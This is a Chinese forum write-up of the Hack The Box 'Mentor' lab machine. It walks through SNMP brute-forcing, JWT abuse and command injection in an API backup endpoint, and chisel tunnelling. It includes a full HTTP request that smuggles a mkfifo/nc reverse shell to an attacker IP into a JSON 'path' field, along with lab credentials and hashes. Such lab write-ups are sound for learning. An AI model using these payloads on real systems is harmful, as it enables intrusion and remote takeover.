[原创]HTB Mentor (MEDIUM)-WEB安全-看雪-安全社区|安全招聘|kanxue.com

[原创]HTB Mentor (MEDIUM)

发表于: 2023-1-10 23:28 1866

[原创]HTB Mentor (MEDIUM)

hml189

2023-1-10 23:28

1866

参考链接:
https://meowmeowattack.github.io/htb/mentor/
https://0xdedinfosec.vercel.app/blog/hackthebox-mentor-writeup
https://medium.com/@YMTzioni/htb-write-up-mentor-d00544dd79c5
上来还是先扫端口

图片描述
开放了22和80，再扫一下

图片描述
开启了snmp服务
扫子域名

图片描述
发现状态全是302，过滤302，-fw 18过滤也行

200什么都没找到

图片描述
发现子域api

在扫一下子域的目录

图片描述
http://api.mentorquotes.htb/admin/ 的访问需要授权

http://api.mentorquotes.htb/docs里找到james的邮箱james@mentorquotes.htb
还可以知道站点使用的Swagger

JWT token（JSON Web Token）
"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InN0cmluZyIsImVtYWlsIjoidXNlckBleGFtcGxlLmNvbSJ9.RPFh7ue64oOZBnyDFY0T7yFau51EHj0drU7cjWHDdyY"
图片描述
只能admin可以访问
我们尝试用james的用户和邮箱去申请

会显示该用户已存在，尝试用户名为james，邮箱不一样

通过注册用户名为james来获得james JWT TOKEN的方法失败，一直打不通，如果有会的师傅求带

前面可以看到开启了snmp服务，使用snmpbrute用来实施 SNMP 服务暴力破解。https://github.com/SECFORCE/SNMP-Brute
图片描述
发现了两个名为“Internal”和“Public”的SNMP社区。
使用snmpwalk来检索信息
snmpwalk -c [社区名称] -v [版本] [IP]

图片描述
"/usr/local/bin/login.py kj23sadkj123as0-d213"
我们将它作为james的密码尝试一下
james@mentorquotes.htb
james
kj23sadkj123as0-d213

获得james JWT token

图片描述
成功访问，再去admin看看有什么

发现/check和/backup，进去看看
check还没实现

backup不允许使用GET方式，使用POST

path 存在命令执行

写一个反弹shell

连上后执行不了命令，很奇怪，网的问题？
图片描述

图片描述
上传一个，这样就可以执行命令了

图片描述
好消息 root 坏消息 docker

进行信息收集
db.py里有关于PostgreSQL 数据库的信息
用户名：密码@ip
postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")

使用chisel进行内网穿透https://zhuanlan.zhihu.com/p/360149991
https://github.com/jpillora/chisel
chisel_1.7.7_linux_386.gz 可用

图片描述

图片描述
尝试去破解svc的密码
53f22d0dfa10dce7e29cd31f4f953fd8
https://crackstation.net/
123meunomeeivani

0840b6b9240dbc68acc9c0d320dc029a
svc不能执行sudo命令

使用linpeas进行信息收集

图片描述
cat /etc/snmp/snmpd.conf

createUser bootstrap MD5 SuperSecurePassword123__ DES

/bin/sh SUID漏洞是一种权限提升漏洞，当/bin/sh可执行文件设置了setuid位，允许在文件所有者（通常为root）的权限下运行时，会发生这种漏洞。本地攻击者可利用此漏洞获取系统上的root权限。
为防止此漏洞，应从/bin/sh可执行文件中删除setuid位，或将可执行文件替换为未设置setuid的版本
图片描述

rustscan 10.10.11.193

nmap -sS -sU -T4 -A -v 10.10.11.193

ffuf -w wordlist/SecLists-master/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://mentorquotes.htb -H "Host:FUZZ.mentorquotes.htb" -fs 169

ffuf -w wordlist/SecLists-master/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://mentorquotes.htb -H "Host:FUZZ.mentorquotes.htb" -fs 169 -mc 200,204,301,307,401,403,404,405,500

dirsearch -u http://api.mentorquotes.htb/

snmpwalk -c internal -v2c 10.10.11.193 > snmp.txt

Authorization:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD

--Na0

Authorization:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD

--Na0

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f

POST /admin/backup HTTP/1.1
 
Host: api.mentorquotes.htb
 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
 
Authorization:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD--Na0
 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 
Accept-Language: en-US,en;q=0.5
 
Accept-Encoding: gzip, deflate
 
Connection: close
 
Upgrade-Insecure-Requests: 1
 
content-type: application/json
 
Content-Length: 125
 
{
 
"body":"HTB-POC",
 
"path":"/etc/passwd;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.11 9001 >/tmp/f1;"
 
}

POST /admin/backup HTTP/1.1

Host: api.mentorquotes.htb

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Authorization:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD

--Na0